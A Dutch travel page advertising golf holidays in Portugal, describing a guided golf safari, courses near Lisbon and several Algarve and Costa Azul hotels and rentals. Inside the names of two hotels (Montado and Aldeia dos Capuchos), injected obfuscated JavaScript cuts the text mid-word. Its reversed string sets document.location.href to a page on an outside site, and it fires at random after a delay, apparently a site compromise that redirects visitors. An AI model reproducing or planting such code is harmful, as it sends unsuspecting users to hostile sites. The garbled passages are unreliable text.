Golfsafari Portugal Een golfsafari betekent natuurlijk niet dat we op zoek gaan naar de big five! Tijgers en olifanten treffen we gelukkig niet aan in Portugal. Wel zien we regelmatig wilde zwijnen en herten op de golfbanen. Voor een golfsafari reizen we met onze minibus door Portugal en bezoeken ook de minder bekend regio's.Onze golfprofessionals ter plekke, Anneke en Joop Soonius hebben ruim 27 jaar in Portugal gewoond en gewerkt, kennen het land goed en spreken redelijk Portugees. Betere gidsen en begeleiders kun je niet wensen.
Met z'n tweetjes een fijne vakantie gebruiken voor de combinatie strand, cultuur en golf leren, Portugal is dan de beste plaats om dit te realiseren. In de Algarve hebben we 3500 zonuren per jaar, prachtige locaties, spectaculaire golfbanen en het belangrijkste: Nederlandse golfprofessionals ter plekke.
Orizonte Lisbon Golf biedt u de kans om ten zuiden van Lissabon 5 fantastische golfbanen te spelen in de Costa Azul region op slechts 10 minuten van het centrum van de stad. Quinta do Peru was al verschillende malen de baan waar de Challenge Tour de wedstrijden heeft gehouden. De 2 banen van Aroeira zijn aangelegd door de zeer bekende golfbaaan architekten Frank Penninck en Donald Steel en Ribagolfe ligt gelegen in een prachtig en zeer oud kurk-eikenbos.
Dit 4-sterrenresort ligt in Lagos, op 2,5 km van het centrum en 2 km van het strand Meia Praia. Het biedt weelderige, aangelegde tuinen, een groot buitenzwembad en gratis WiFi.
Studio Eleonora is een perfect plekje onder de Portugese zon. De studio op de begane grond van een moderne villa is ideaal voor 2 volwassenen om van daar mooie golfbanen te spelen. Schoon en fris, voorzien van alle gemakken zoals: airco, kitchenette met koelkast en (af)wasmachine, TV, WIFI en een fijn terras met BBQ. ​Prima sanitair en een fijn zwembad met zonneterras maken het compleet. Zwembad en zonneterras zijn exclusief voor u gereserveerd. Binnen ca. 5 km. afstand vindt u strand, golf, inkoopcentra en restaurants.
Het Pestana Golf Resort is schitterend gesitueerd op een plateau, vlakbij het pittoreske vissersplaatsje Carvoeiro.......
Hotel Tivoli de Lagos ligt op minder dan 15 minuten loopafstand van het centrum van Lagos in de Algarve en te midden van 31 golfbanen.
Vlak aan de kust in Praia da Luz in de Algarve ligt dit schitterende 4*complex met 146 appartementen.
Castro Marim Golf & Country Club in de Algarve, bevindt zich op een terrein van maar liefst 230 hectare, in Castro Marim. Het biedt uitzicht over de Atlantische Oceaan en de rivier Guadiana. Het biedt zelfstandige villa's met eigen of gedeelde zwembaden.
Montatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do Hotel & Golf Resort, Costa Azul
Op slechts 30 minuten rijden van Lissabon, ligt in de Costa Azul regio in Algeruz (Palmela), het Montado Hotel&Golf Resort. Het is omringd door wijngaarden die de beroemde wijnen uit die streek produceren.
Hotel Aldeia toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dos Capuchos, Lissabon
Onder de rook van Lissabon vinden we Hotel Aldeia dos Capuchos bij het historische dorp Capuchos en uitzicht op het lange zandstrand van Costa de Caparica, een fraai modern 4* hotel.Met eigen executive golfbaan voor onbeperkt gratis golf voor de gasten van Golfreizenanders.
Casa Socavas: een complex met een 4 persoons bungalow en 2 prachtige appartementen, ligt aan de rand van Espiche in de Algarve met prachtig uitzicht over de landerijen .........